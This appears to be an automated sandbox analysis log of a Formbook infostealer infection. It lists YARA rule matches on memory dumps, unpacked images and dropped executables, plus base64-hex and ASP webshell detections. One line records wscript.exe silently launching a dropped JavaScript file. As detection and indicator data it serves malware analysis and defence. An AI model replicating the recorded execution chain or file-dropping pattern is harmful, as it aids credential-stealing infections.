Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.402204010.000001873775D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.388216987.00000187377E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.921876626.0000020FBC1E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.386427385.0000018737747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403161065.000001873775E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.388318935.0000018737762000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.402093855.0000018737752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396207507.00000187377A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.398203323.00000187377E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.398506960.000001873779E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.396086134.00000187377EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.922283429.0000026A4F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.396200363.000001873779E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.387944732.00000187377E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.401344899.00000187377EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 5708, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
